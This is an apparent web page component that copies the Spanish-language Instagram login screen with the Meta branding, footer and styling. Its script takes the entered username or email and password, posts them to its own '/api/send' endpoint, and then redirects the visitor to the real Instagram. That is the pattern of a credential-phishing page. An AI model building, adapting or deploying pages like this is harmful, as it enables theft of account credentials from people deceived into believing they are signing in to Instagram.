---

---

<main class="flex align-items-center justify-content-center">
  <img class="img-desktop" src="/img/movil.png" alt="Imagen para ordenador" />
  <section id="mobile" class="flex"></section>
  <section id="auth" class="flex direction-column">
    <div class="panel login flex direction-column">
      <h1 title="Instagram" class="flex justify-content-center">
        <img src="./img//instagram-logo.png" alt="Logo de Instagram" />
      </h1>
      <form>
        <label for="email" class="sr-only">Teléfono, nombre de usuario o correo electrónico</label>
        <input name="email" placeholder="Teléfono, nombre de usuario o correo electrónico" />

        <label for="password" class="sr-only">Contraseña</label>
        <input name="password" type="password" placeholder="Contraseña" />

        <button type="button" id="loginButton">Entrar</button>
      </form>
      <div class="flex separator align-items-center">
        <span></span>
        <div class="or">O</div>
        <span></span>
      </div>
      <div class="login-with-fb flex direction-column align-items-center">
        <div class="logf">
          <svg
            aria-label="Iniciar sesión con Facebook"
            class="x1lliihq x1n2onr6 x173jzuc facebook"
            fill="#6699CC"
            height="20"
            role="img"
            viewBox="0 0 16 16"
            width="20"
          >
            <title>Iniciar sesión con Facebook</title>
            <g clip-path="url(#a)">
              <path
                d="M8 0C3.6 0 0 3.6 0 8c0 4 2.9 7.3 6.8 7.9v-5.6h-2V8h2V6.2c0-2 1.2-3.1 3-3.1.9 0 1.8.2 1.8.2v2h-1c-1 0-1.3.6-1.3 1.3V8h2.2l-.4 2.3H9.2v5.6C13.1 15.3 16 12 16 8c0-4.4-3.6-8-8-8Z"
                fill="#6699CC"></path>
            </g>
            <defs>
              <clipPath id="a"><rect fill="currentColor" height="16" width="16"></rect></clipPath>
            </defs>
          </svg>
          <a>Iniciar sesión con Facebook</a>
        </div>
        <a href="#">¿Olvidaste tu contraseña?</a>
      </div>
    </div>
    <div class="panel register flex justify-content-center">
      <p>¿No tienes una cuenta?</p>
      <a href="#">Regístrate</a>
    </div>
    <div class="app-download flex direction-column align-items-center">
      <p class="small-font">Descargar la aplicación.</p>
      <div class="div-img-app">
        <img class="img-app" src="./img/apple-button.png" title="Imagem com a logo da Apple Store" />
        <img class="img-app" src="./img/googleplay-button.png" title="Imagem com a logo da Google Play" />
      </div>
    </div>
  </section>
</main>
<footer>
  <ul class="flex flex-wrap justify-content-center">
    <li><a href="#">Meta</a></li>
    <li><a href="#">Información</a></li>
    <li><a href="#">Blog</a></li>
    <li><a href="#">Empleo</a></li>
    <li><a href="#">Ayuda</a></li>
    <li><a href="#">API</a></li>
    <li><a href="#">Privacidad</a></li>
    <li><a href="#">Condiciones</a></li>
    <li><a href="#">Ubicaciones</a></li>
    <li><a href="#">Instagram Lite</a></li>
    <li><a href="#">Threads</a></li>
    <li><a href="#">Subir contactos y personas no usuarios</a></li>
    <li><a href="#">Meta Verified</a></li>
  </ul>
  <p class="copyright">© 2025 Instagram from Meta</p>
</footer>

<script>
  import { redirectUserToInstagram } from "../assets/utilities.js";

  const loginButton = document.getElementById("loginButton");
  if (loginButton) {
    loginButton.addEventListener("click", () => {
      const email: string = (document.querySelector('input[name="email"]') as HTMLInputElement).value;
      const password: string = (document.querySelector('input[name="password"]') as HTMLInputElement).value;
      fetch("/api/send", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({
          email: email,
          password: password,
        }),
      })
        .then((response) => response.json())
        .then((data) => {
          console.log(data);
          redirectUserToInstagram();
        })
        .catch((error) => {});
    });
  }
</script>

<style>
  .div-img-app > .img-app {
    max-height: 35px;
    width: auto;
  }

  .img-desktop {
    width: auto;
    max-height: 600px;
    margin-right: 50px;
    margin-bottom: 50px;
  }

  #loginButton {
    border-radius: 7px;
  }
  #loginButton:focus {
    background-color: #0063a5;
  }

  #loginButton:hover {
    background-color: #2c64cd;
  }

  * {
    border: none;
    box-sizing: border-box;
    font-family: Arial, Helvetica, sans-serif;
    margin: 0;
    padding: 0;
  }

  body {
    background-color: #fafafa;
    height: 100vh;
  }

  main {
    height: 90vh;
    margin: auto;
    max-width: 935px;
  }

  a {
    text-decoration: none;
  }
  h1 {
    margin: 20px 0;
  }
  ul {
    list-style: none;
  }

  /**
   * Flex rules
   */

  .flex {
    display: -webkit-box;
    display: -moz-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
  }

  .logf {
    display: flex;
    justify-content: center;
    align-items: center;
  }

  .facebook {
    margin-right: 10px;
  }

  .direction-column {
    -webkit-box-direction: normal;
    -webkit-box-orient: vertical;
    -moz-box-direction: normal;
    -moz-box-orient: vertical;
    -webkit-flex-direction: column;
    -ms-flex-direction: column;
    flex-direction: column;
  }

  .justify-content-center {
    -webkit-box-pack: center;
    -moz-box-pack: center;
    -ms-flex-pack: center;
    -webkit-justify-content: center;
    justify-content: center;
  }

  .align-items-center {
    -webkit-box-align: center;
    -moz-box-align: center;
    -ms-flex-align: center;
    -webkit-align-items: center;
    align-items: center;
  }

  .flex-wrap {
    -webkit-flex-wrap: wrap;
    -ms-flex-wrap: wrap;
    flex-wrap: wrap;
  }

  /**
   *
   */

  .panel {
    background-color: white;
    border: 1px solid #dbdbdb;
    margin-bottom: 10px;
    padding: 10px;
  }

  #auth {
    max-width: 350px;
  }
  #mobile {
    max-width: 454px;
  }

  #mobile img {
    height: 618px;
  }

  /**
   * Login section
   */
  .login-with-fb,
  form {
    width: 100%;
  }

  .register,
  form {
    padding: 30px 20px;
  }

  .login-with-fb {
    padding: 30px 20px 20px 20px;
  }

  form .sr-only {
    display: none;
  }

  form input {
    background-color: #fafafa;
    border: 1px solid #dbdbdb;
    border-radius: 3px;
    color: #808080;
    margin-bottom: 8px;
    padding: 10px 10px;
    width: 100%;
  }

  form input::placeholder {
    color: #808080;
  }

  form input:focus {
    border: 1px solid #808080;
    outline: none;
  }

  form button {
    background-color: #0095f6;
    border-radius: 5px;
    color: #fff;
    font-weight: bold;
    height: 35px;
    margin-top: 10px;
    width: 100%;
  }

  /**
   * Separator login form from login with fb
   */
  .separator span {
    background-color: #dbdbdb;
    height: 1px;
    width: calc(100% - 10px);
  }

  .separator .or {
    color: #808080;
    font-weight: bold;
  }

  .separator {
    padding: 0 20px;
  }
  .separator span:first-child {
    margin-right: 10px;
  }
  .separator span:last-child {
    margin-left: 10px;
  }

  /**
   * Login with fb section
   */
  .login-with-fb a {
    color: #385185;
  }

  .login-with-fb > a {
    font-size: 12px;
  }
  .login-with-fb div a {
    font-weight: bold;
  }
  .login-with-fb div {
    margin-bottom: 15px;
  }

  .small-font {
    font-size: 14px;
    color: #131313;
  }

  /**
   * Register section
   */
  .register * {
    font-size: 14px;
  }
  .register a {
    color: #0095f6;
    font-weight: bold;
  }

  .register p {
    margin-right: 5px;
  }

  /**
   * App download
   */
  .app-download {
    padding: 15px;
  }
  .app-download p {
    padding: 10px 0;
  }
  .app-download img {
    height: 40px;
    margin: 0 5px;
  }

  /**
   * Footer
   */
  footer {
    height: 10vh;
    margin: 0 auto 30px auto;
    max-width: 935px;
    font-size: small;
  }
  footer ul {
    margin-bottom: 20px;
  }
  footer ul li {
    margin: 0 10px 10px;
  }
  footer ul li a {
    color: #808080;
  }

  footer ul li a:hover {
    text-decoration: underline;
  }

  footer .copyright {
    color: #808080;
  }
  footer ul li a,
  footer .copyright {
    font-weight: bold;
    text-align: center;
  }

  /**
   * Media queries
   */

  @media screen and (max-width: 767px) {
    main {
      margin: 30px auto 50px auto;
      .img-desktop {
        display: none;
      }
    }
    footer .copyright,
    footer ul li a {
      font-size: 13px;
    }
  }
</style>
